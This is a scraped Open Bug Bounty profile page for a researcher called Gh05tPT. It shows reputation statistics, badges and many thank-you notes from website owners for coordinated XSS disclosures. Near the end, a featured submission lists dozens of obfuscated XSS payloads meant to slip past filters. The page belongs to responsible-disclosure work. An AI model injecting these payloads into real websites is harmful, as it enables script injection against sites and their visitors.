Infosec Institute

Open Bug Bounty mentioned in the
Top 6 Bug Bounty programs of
2022 by the InfoSec Institute

The Hacker News

Open Bug Bounty named among the
Top 5 Bug Bounty programs of 2021
by The Hacker News

Platform update: please use our new authentication mechanism to securely use the Open Bug Bounty Platform.
For security researchers
Report a Vulnerability
Submit, help fixing, get kudos.
For website owners
Start a Bug Bounty
Run your bounty program for free.
1,708,296 coordinated disclosures
1,384,982 fixed vulnerabilities
1,997 bug bounty programs, 3,898 websites
47,505 researchers, 1,654 honor badges

Gh05tPTTop-50 VIP Open Redirect Reporter Top Security Researcher of the Month Top VIP Security Researcher of the Month | Security Researcher Profile


Security researcher Gh05tPT has already helped fix 12509 vulnerabilities.



Researcher reputation:  830

Real name:
#Gh05tPT #inurlBR #AccessSecLab

About me:
http://blog.inurl.com.br/
https://ccess.co/

Contact email:
[email protected]://twitter.com/Gh05tPThttp://blog.inurl.com.br/https://facebook.com/InurlBrasilhttps://facebook.com/podzemie4544https://facebook.com/exchangesechttps://ccess.co

Alternative Contacts:
http://blog.inurl.com.br/

Experience in Application Security
over 5 years

Award / Bug Bounty I prefer:
A thanks/profile recommendation will be really appreciated, but if you'd like:
# Bug Bounty ($$$)
# Hall Of Fame
# T-shirts, Sweats, Caps, Stickers, Keychains, etc

Halls of Fame:
https://www.pejadesign.com/chi-siamo/chi-siamo#manyThanks.
https://unite.un.org/content/hall-fame

Follow me on:
Twitter
Facebook

Ethics and Rules:
#Gh05tPT #inurlBR #AccessSecLab is required to abide by the ethics and rules of the Open Bug Bounty project. If you reasonably believe that rules are not respected, please report this to us.

Recommendations and Acknowledgements | Full List:

@greencj     20 January, 2022
    Twitter greencj Glover from Fukusuu:
Very helpful with some major security vulnerability on our site. Thank you.
@xmbanet     13 January, 2021
    Twitter xmbanet Theocharis Manousaridis from BUSINESS NET ARCHITECTS S.A.:
Gh05tPT found an XSS vulnerability, provided us the information necessary in order to patch the vulnerability.
Thanks for your assistance!
@sczid     2 November, 2020
    Twitter sczid Zentraler Informatikdienst from University of Vienna:
Dear Gh05tPT,

The University of Vienna would like to thank you for your valuable contribution in finding multiple website security issues. Your input is highly welcome and helps to raise the security level of our educational institution.

Servus and greetings from Vienna, Austria.
@kitnospt     15 September, 2020
    Twitter kitnospt kitnospt from Hijiffy:
Thanks for your help, very professional and helpful.
@LKee6r     4 June, 2020
    Twitter LKee6r Johannes Segitz from SUSE:
Research privately disclosed XSS vulnerability. Thank you for the notification!
@IgnMa     19 May, 2020
    Twitter IgnMa Hypsas from Hypsas:
Gh05tPT found a XSS vulnerability on our site. Thanks so much
@CMS4BB     11 February, 2020
    Twitter CMS4BB Mark from CESA 6:
Gh05tPT found an XSS vulnerability, provided us the information necessary in order to patch the vulnerability. Thanks for your assistance!
@install28398408     15 January, 2020
    Twitter install28398408 evg from kuli:
thanks for Notification!
@lbl_jd     4 December, 2019
    Twitter lbl_jd Jeff Anderson from LBNL:
Gh05tPT found a XSS vulnerability on our site which I was able to fix quite quickly. Thanks for your help.
@Derek_Ortiz     25 November, 2019
    Twitter Derek_Ortiz Derek from Revize:
Thanks for the XSS report. We should be able to get the issue fixed next patch.
@ContatoFAME     13 November, 2019
    Twitter ContatoFAME Alexandre from DNOCS:
Thanks for the details about the failure found on one of our sites.
@arthurebel     12 November, 2019
    Twitter arthurebel Arthur from University Of Technology of Troyes:
Thank you for your help, for the detail of XSS vulnerabilty. Much appreciate.
@koichiendor     12 November, 2019
    Twitter koichiendor koichiendor from ADMINA:
Thanks for reporting XSS issue on my site. Clear report, helpful support. :)
@dialbuquerque     29 October, 2019
    Twitter dialbuquerque Diego Albuquerque from CNMP:
O Gh05tPT reportou uma vulnerabilidade em um sistema do órgão em que trabalho e nos ajudou a solucioná-la logo no primeiro contato. Muito obrigado.
@TravisSwaim     16 October, 2019
    Twitter TravisSwaim T. Swaim from Earth System Science Interdisciplinary Center - UMD:
Was very easy to contact Gh05tPT and get the information needed to help fix the vulnerability found on our website. Wonderful security researcher to deal with and I'm glad that people like this exist to help make the internet a more secure and safe place.
@ChipZ_de     20 September, 2019
    Twitter ChipZ_de Andreas from MEHRKANAL:
Gh05tPT has found an XSS vulnerability on one of our pages.

He is very helpful and responded very quickly. I really appreciate it. Thank you very much.
@aaccomazzi     21 August, 2019
    Twitter aaccomazzi Alberto Accomazzi from Center for Astrophysics:
One more XSS bug discovered and patched thanks to Gh05tPT. Much appreciated!
@NewLineHorizon1     3 August, 2019
    Twitter NewLineHorizon1 Melisa from NewLineHorizon:
Dear,

Thanks for participating in responsible disclosure program.
The reports you submitted were extremely helpful to our team and provided us the details we needed to resolve the issues that you identified.
We are deeply committed to provide a safe and secure experience to our users and are therefore grateful for your efforts to help us improve our services.

Best Regards!
@tony_marston     12 June, 2019
    Twitter tony_marston Tony Marston from Radicore Software Limited:
Gh05tPT found a XSS vulnerability on my site which I was able to fix quite quickly. Thanks for your help.
@CapaniAntonio     12 June, 2019
    Twitter CapaniAntonio Antonio Capani from Nibbles.it s.r.l.:
Gh05tPT found a XSS vulnerability on one of our sites. We will fix it on the next version of our CMS. Thank you very much for your help!
@aaccomazzi     24 May, 2019
    Twitter aaccomazzi Alberto Accomazzi from Center for Astrophysics:
Gh05tPT helped us discover and fix an XSS vulnerability on our website. Much appreciated!
@Admeus     16 May, 2019
    Twitter Admeus Master from EVS:
Gh05tPT found a XSS vulnerability on our website, which was promptly resolve with his help. Really good communication and sympathy. Thanks
@rjbica     10 May, 2019
    Twitter rjbica Ricardo from XWS:
Gh05tPT found a XSS issue in one of our systems and provided us the technical details to help solve the problem. Thanks!
@pkissman     3 May, 2019
    Twitter pkissman Paul Kissman from Massachusetts Board of Library Commissioners:
Gh05tPT found a basic XSS vulnerability on our website. Some javascript could be entered as a parameter in a GET query and though it wouldn't be processed as form data, it could be reflected out again (unescaped) on the search results page.

Thanks very much Gh05tPT.
@ChabadoneY     27 February, 2019
    Twitter ChabadoneY Yossi from Chabad.org:
Gh05tPT reported an XSS vulnerability and took the time to help us through resolving it. Gh05tPT was very pleasant to work with and was very professional. Thanks for all your help!
@ChabadoneY     27 February, 2019
    Twitter ChabadoneY Yossi from Chabad.org:
Gh05tPT reported an XSS vulnerability and took the time to help us through resolving it. Gh05tPT was very pleasant to work with and was very professional. Thanks for all your help!
@VTCMagazine1     7 February, 2019
    Twitter VTCMagazine1 Andy from Mudconnect.com:
Thank you for helping mudconnect by reporting the XSS vulnerability Gh05tPT!
@L2JDrLecter     7 February, 2019
    Twitter L2JDrLecter Ariel Graneros from Poder Judicial:
Gh05tPT found a security problem in one of our services. Once contacted he responded quickly and professionally. Thank you very much!
@ProdestComunica     28 November, 2018
    Twitter ProdestComunica Eric from Prodest:
Thanks to @Gh05tPT for helping us to increase the security of one of our web applications. Keep up the good work!
@RodrigoFaustini     28 November, 2018
    Twitter RodrigoFaustini Rodrigo Faustini from Private:
@Gh05tPT reported a XXS vulnerability on our site. Thank you very much!
@franciscomesa     19 September, 2018
    Twitter franciscomesa Francisco Mesa from ELR:
Gh05tPT found a XSS vulnerability on our website and was quick to respond with technical detail. It's cool to find online researchers with this efficient profile.
@AppsecDiligent     13 September, 2018
    Twitter AppsecDiligent Joel Kerr from Diligent:
Really appreciate your help in detecting and helping us resolve our XSS issue. We were able to communicate together and get it fixed within a weeks time. Thanks again!
@MohammedSultanM     7 September, 2018
    Twitter MohammedSultanM Sultan from NBA:
Thank you Gh05tPT for the amazing job on pinpointing a weakness on one of our websites!
@aaccomazzi     4 September, 2018
    Twitter aaccomazzi Alberto Accomazzi from NASA Astrophysics Data System:
Thank you Gh05tPT for pointing out a security issue on our server, appreciate your work!
@NickTheNight78     23 August, 2018
    Twitter NickTheNight78 Nicola La Notte from dpconsulenze S.r.l.:
Thanks Gh05tPT for reporting us the issue on our website, we check and solve. Very good work.
@OMABrowser     12 August, 2018
    Twitter OMABrowser Adrian Altenhoff from OMA Browser:
Thanks to @Gh05tPT for reported bug and helpful feedback to solve the vulnerability.
@jrsaysthxalot     6 August, 2018
    Twitter jrsaysthxalot jrsayThxALot :
Thanks a lot for reported bug by Gh05tPT. Very fast response and very helpfully. Keep up the great work!
@alesom77     4 August, 2018
    Twitter alesom77 alesom77 from ArpaPiemonte:
Gh05tPT found a security problem on one of our servers. I recommend him because he responded quickly and professionally. Thank you very much.
@webmarkeurope     2 August, 2018
    Twitter webmarkeurope Developer from COS:
Gh05tPT found a XSS vulnerability on our websites and was quick to respond to an email with technical detail. Thank you for that.
@armando_caruso     1 August, 2018
    Twitter armando_caruso Armando Caruso from SID:
Gh05tPT found a XSS vulnerability on our websites and was quick to respond to an email with tecnical detail.
@promatik     19 July, 2018
    Twitter promatik António Almeida from Gema Digital:
Em nome da Animais de Rua, obrigado pela ajuda!
Gh05tPT encontrou um problema na página, respondeu rapidamente às perguntas colocadas e ajudou a resolver o problema.
Obrigado!
@ssauer14     19 July, 2018
    Twitter ssauer14 ssauer :
Thanks a lot, it is great when people help each other.
Keep up the good work.
@goodyear0005     19 July, 2018
    Twitter goodyear0005 Matt from Interactechnology:
Gh05tPT found a XSS vulnerability on our websites and was quick to respond to an email. We appreciated his help very much.
@scrum_master     18 July, 2018
    Twitter scrum_master Alexander Kriegisch from ---:
Thanks for the helpful and friendly communication with me on behalf of the web site owner I was checking this issue for with you. Keep up the good work.
@aaccomazzi     17 July, 2018
    Twitter aaccomazzi Alberto Accomazzi from Center for Astrophysics:
Gh05tPT discovered an XSS vulnerability on our website and communicated the details to us very promptly. We are very grateful to him for his assistance and advice.
@Lordskynner     17 July, 2018
    Twitter Lordskynner Jerri Dick from Isso Tecnologia:
Thx for reported bug @Gh05tPT, quick to respond and helpfull do solve vulnerability
@shus_work     3 July, 2018
    Twitter shus_work Shuzo Masuyama from ARPAK:
こんにちは Mr.Gh05tPT

脆弱性の指摘をいただき、感謝いたします。
あなたのおかげで、私達のwebサイトのセキュリティを強化することができます。
@zeroFiG     29 June, 2018
    Twitter zeroFiG Mark Cameron from Enhanced Integrated Framework:
Gh05tPT was quick to respond, very polite and helpful during the resolution of the XSS vulnerability.

A kind thank you from the team.
@AhgoraS     21 June, 2018
    Twitter AhgoraS Fernando from Ahgora:
We thank you for your colaboration and responsible disclosure!
@Jorg3     12 June, 2018
    Twitter Jorg3 Jorge Reis from Caixatec:
Thanks for your colaboration!!!
@pejadesign     4 June, 2018
    Twitter pejadesign Gabriele from Peja Design:
Gh05tPT found an XSS bug on my website. Many Thanks!
@creampai     30 May, 2018
    Twitter creampai Kaoru Iwata from Time Intermedia:
こんにちは、ミスターGh05tPT

脆弱性の詳細を教えてくれてありがとう。
あなたの行動のお陰で、私たちのサイトのセキュリティが向上します。

私はセキュリティアップデートを適用する予定です。

Please login via Twitter to add a recommendation

Honor Badges


Number of Secured Websites

10+ Secured Websites Badge
50+ Secured Websites Badge
500+ Secured Websites Badge
Web Security Veteran Badge
10+ Websites
50+ Websites
500+ Websites
WEB SECURITY VETERAN
1000+ Websites

Advanced Security Research

WAF Bypasser Badge
CSRF Master Badge
AppSec Logic Master Badge
Fastest Fix Badge
WAF Bypasser
CSRF Master
30+ Reports
AppSec Logic Master
30+ Reports
Fastest Fix
Fix in 24 hours

Outstanding Achievements

Secured OBB Badge
OBB Advocate Badge
Improved OBB Badge
Secured OBB
OBB Advocate
Improved OBB

Commitment to Remediate and Patch

Patch Master Badge
Patch Guru Badge
Patch Lord Badge
Patch Master
55% Patched
Patch Guru
65% Patched
Patch Lord
75% Patched

Recommendations and Recognition

REPUTABLE Badge
FAMOUS Badge
GLOBALLY TRUSTED Badge
REPUTABLE
10+ Recommends
FAMOUS
25+ Recommends
GLOBALLY TRUSTED
50+ Recommends

Distinguished Blog Author

Distinguished Blog Author Badge
Distinguished Blog Author Badge
Distinguished Blog Author Badge
1 Post
3 Posts
5+ Posts

Research Statistics



Total reports:31213
Total reports on VIP sites:1024
Total patched vulnerabilities:12509
Recommendations received:52
Active since:05.04.2018
Top Security Researcher Awards:Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month
Top VIP Security Researcher Awards: Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week

Open Bug Bounty Certificate


Researcher Certificate

Reported Vulnerabilities

All Submissions VIP SubmissionsFeatured Submissions


04.04.2019  XSS alert() variants

<script>prompt(1)</script> 
<script>confirm(1)</script>
<script>var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk=')); </script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script> <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
<script>'str1ng'.replace(/1/,alert)</script> <script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script> <script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/,function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
<script>eval('\\u'+'0061'+'lert(1)')</script> <script>throw~delete~typeof~prompt(1)</script> <script>delete[a=alert]/prompt a(1)</script> <script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script> <script>(()=>{return this})().alert(1)</script>
<script>new function(){new.target.constructor('alert(1)')();}</script> <script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script>
<link/rel=prefetch import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script> <script>Array.from`1${alert}3${window}2`</script>
<script>!{x(){alert(1)}}.x()</script> <script>Array.from`${eval}alert\`1\``</script> <script>Array.from([1],alert)</script> <script>Promise.reject("1").then(null,alert)</script>
<svg </onload ="1> (_=alert,_(1)) "">
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>
<img onerror=alert(1) src <u></u> <videogt;<source onerror=javascript:prompt(911)gt;
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
<script>```${``[class extends[alert``]{}]}```</script> <script>[class extends[alert````]{}]</script>
<script>throw new class extends Function{}('alert(1)')``</script> <script>x=new class extends Function{}('alert(1)'); x=new x;</script> <script>new class extends alert(1){}</script>
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script> <script src=data:,\u006fnerror=\u0061lert(1)></script>
"><svg><script/xlink:href="data:,alert(1) <svg><script/xlink:href=data:,alert(1)></script> <frameset/onpageshow=alert(1)>
<div onactivate=alert('Xss') id=xss style=overflow:scroll>
<div onfocus=alert('xx') id=xss style=display:table>

  Latest Patched

 10.05.2024 moodle.saude.gov.br
 10.05.2024 moodle.uerr.edu.br
 09.05.2024 vamnicom.gov.in
 07.05.2024 governor.pa.gov
 07.05.2024 vis.globe.gov
 06.05.2024 dbtbharat.gov.in

  Latest Blog Posts

04.12.2023 by BAx99x
Unmasking the Power of Cross-Site Scripting (XSS): Types, Exploitation, Detection, and Tools
04.12.2023 by a13h1_
$1120: ATO Bug in Twitter’s
04.12.2023 by ClumsyLulz
How I found a Zero Day in W3 Schools
04.12.2023 by 24bkdoor
Hack the Web like a Pirate: Identifying Vulnerabilities with Style
04.12.2023 by 24bkdoor
Navigating the Bounty Seas with Open Bug Bounty

  Recent Recommendations

    1 May, 2024
    Mek:
Got a recommendation to fix an SQL injection vulnerability on my website. As I am a hobbyist and my page is a hobby project, I can't offer money, so I am recommending this researcher. Thanks again.
    26 April, 2024
    I_bims_Mike:
Thank you very much for identifying the XSS vulnerability and for our friendly email exchange.
    22 April, 2024
    genoverband:
Thank you for your invaluable help in ensuring the security of our domain and its visitors!
    10 April, 2024
    Mars:
Hatim uncovered a XSS bug that we were able to quickly resolve. Thanks very much for your assistance and help.
    8 April, 2024
    Panthermedia:
Thanks to the support of Hatim Chabik, we were able to identify and solve an XSS bug.